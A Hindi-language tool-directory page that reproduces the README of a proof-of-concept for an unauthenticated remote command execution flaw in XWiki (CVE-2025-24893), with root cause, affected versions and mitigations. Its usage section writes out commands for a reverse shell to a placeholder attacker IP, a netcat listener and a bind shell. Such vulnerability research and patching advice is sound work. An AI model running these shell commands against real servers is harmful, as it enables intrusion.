Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24893-PoC — CVE-2025-24893 के लिए अवधारणा का प्रमाण जो XWiki में असुरक्षित सर्वर-साइड टेम्पलेट मूल्यांकन के माध्यम से अप्रमाणित दूरस्थ कमांड निष्पादन प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/breakingrohit/cve-2025-24893-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubbreakingrohit/cve-2025-24893-poc

CVE-2025-24893-PoC

CVE-2025-24893 के लिए अवधारणा का प्रमाण जो XWiki में असुरक्षित सर्वर-साइड टेम्पलेट मूल्यांकन के माध्यम से अप्रमाणित दूरस्थ कमांड निष्पादन प्रदर्शित करता है।

रिपॉजिटरी देखें
228 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24893 – XWiki रिमोट कमांड निष्पादन (प्रूफ ऑफ कॉन्सेप्ट)

अवलोकन

यह रिपॉजिटरी CVE-2025-24893 के लिए एक नियंत्रित प्रूफ ऑफ कॉन्सेप्ट (PoC) प्रदान करती है, जो XWiki को प्रभावित करने वाली एक अप्रमाणित रिमोट कमांड निष्पादन (RCE) कमजोरी है।

यह कमजोरी हमलावर को सर्वर पर मनमानी ऑपरेटिंग सिस्टम कमांड निष्पादित करने की अनुमति देती है, क्योंकि सर्वर-साइड टेम्पलेट और स्क्रिप्ट का असुरक्षित मूल्यांकन होता है।


XWiki के बारे में

XWiki एक ओपन-सोर्स एंटरप्राइज़ विकी प्लेटफ़ॉर्म है जिसका उपयोग आमतौर पर निम्नलिखित के लिए किया जाता है:

  • आंतरिक दस्तावेज़ीकरण
  • ज्ञान आधार
  • टीम सहयोग पोर्टल

चूँकि XWiki को अक्सर इंटरनेट-फेसिंग सर्वर पर तैनात किया जाता है, इसलिए इसके अनुरोध हैंडलिंग और स्क्रिप्टिंग लॉजिक में सुरक्षा कमजोरियों का वास्तविक दुनिया में उच्च प्रभाव हो सकता है।


कमजोरी का सारांश

  • CVE ID: CVE-2025-24893
  • श्रेणी: सर्वर-साइड टेम्पलेट इंजेक्शन जो रिमोट कमांड निष्पादन की ओर ले जाता है
  • आक्रमण वेक्टर: HTTP GET अनुरोध
  • प्रमाणीकरण आवश्यक: कोई नहीं
  • प्रभाव: सर्वर विशेषाधिकारों के साथ मनमानी कमांड निष्पादन

मूल कारण

SolrSearch एंडपॉइंट को भेजे गए उपयोगकर्ता-नियंत्रित इनपुट को Groovy स्क्रिप्टिंग इंजन द्वारा अनुचित रूप से मान्य और मूल्यांकित किया गया था। इससे हमलावर द्वारा प्रदान किए गए इनपुट को निष्पादन योग्य सर्वर-साइड कोड के रूप में व्याख्यायित किया जा सकता था, जिसके परिणामस्वरूप होस्ट सिस्टम पर कमांड निष्पादन हुआ।


प्रभावित संस्करण

  • XWiki संस्करण 15.10.10 तक और इसमें शामिल
  • बाद के रिलीज़ में पैच किया गया

प्रूफ ऑफ कॉन्सेप्ट क्षमताएँ

यह PoC निम्नलिखित का प्रदर्शन करता है:

  • कमजोरी का पता लगाने का मोड एक निर्दोष सर्वर-साइड एक्सप्रेशन निष्पादित करके सुरक्षित रूप से पुष्टि करता है कि लक्ष्य उदाहरण कमजोर है या नहीं।

  • रिमोट कमांड निष्पादन लक्ष्य प्रणाली पर मनमानी कमांड निष्पादन का प्रदर्शन करता है।

  • रिवर्स शेल निष्पादन लक्ष्य से परीक्षक के लिए एक आउटबाउंड शेल कनेक्शन स्थापित करता है।

  • बाइंड शेल (वैकल्पिक) लक्ष्य होस्ट पर एक सुनने वाला शेल खोलता है (रिवर्स शेल से कम विश्वसनीय)।


उपयोग

कमजोरी की जाँच

root@kitploit:~
python3 xwiki_cve_2025_24893.py http://target:8080 -m check

रिवर्स शेल (अनुशंसित)

root@kitploit:~
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh <attacker_ip> -lp 4444

बाइंड शेल

root@kitploit:~
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444

उच्च-स्तरीय आक्रमण प्रवाह

  1. एक क्राफ्टेड अनुरोध कमजोर SolrSearch एंडपॉइंट पर भेजा जाता है
  2. दुर्भावनापूर्ण टेम्पलेट निर्देश उपयोगकर्ता-नियंत्रित इनपुट के माध्यम से इंजेक्ट किए जाते हैं
  3. इनपुट को Groovy इंजन द्वारा विश्वसनीय कोड के रूप में मूल्यांकित किया जाता है
  4. सर्वर पर मनमानी ऑपरेटिंग सिस्टम कमांड निष्पादित की जाती हैं

शमन मार्गदर्शन

  • XWiki को तुरंत एक पैच किए गए संस्करण में अपग्रेड करें
  • जहाँ संभव हो आंतरिक एंडपॉइंट तक पहुँच को प्रतिबंधित करें
  • सर्वर-साइड स्क्रिप्टिंग कार्यक्षमता को सीमित या सैंडबॉक्स करें
  • असामान्य टेम्पलेट निष्पादन व्यवहार के लिए एप्लिकेशन लॉग की निगरानी करें

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।

स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध इस कोड का कोई भी अनधिकृत उपयोग निषिद्ध है।


क्रेडिट

  • मूल कमजोरी अनुसंधान और PoC प्रेरणा अल बरादी जॉय द्वारा
  • शैक्षिक और रक्षात्मक सुरक्षा अनुसंधान के लिए रिफैक्टर्ड और विस्तारित

इस रिपॉजिटरी का उद्देश्य

यह रिपॉजिटरी निम्नलिखित प्रदर्शित करने के लिए बनाई गई थी:

  • वास्तविक दुनिया की कमजोरियों का विश्लेषण
  • सुरक्षित और जिम्मेदार प्रूफ-ऑफ-कॉन्सेप्ट विकास
  • सर्वर-साइड टेम्पलेट इंजेक्शन और RCE जोखिमों की समझ
  • रक्षात्मक जागरूकता और शमन विचार

टूल डाउनलोड करें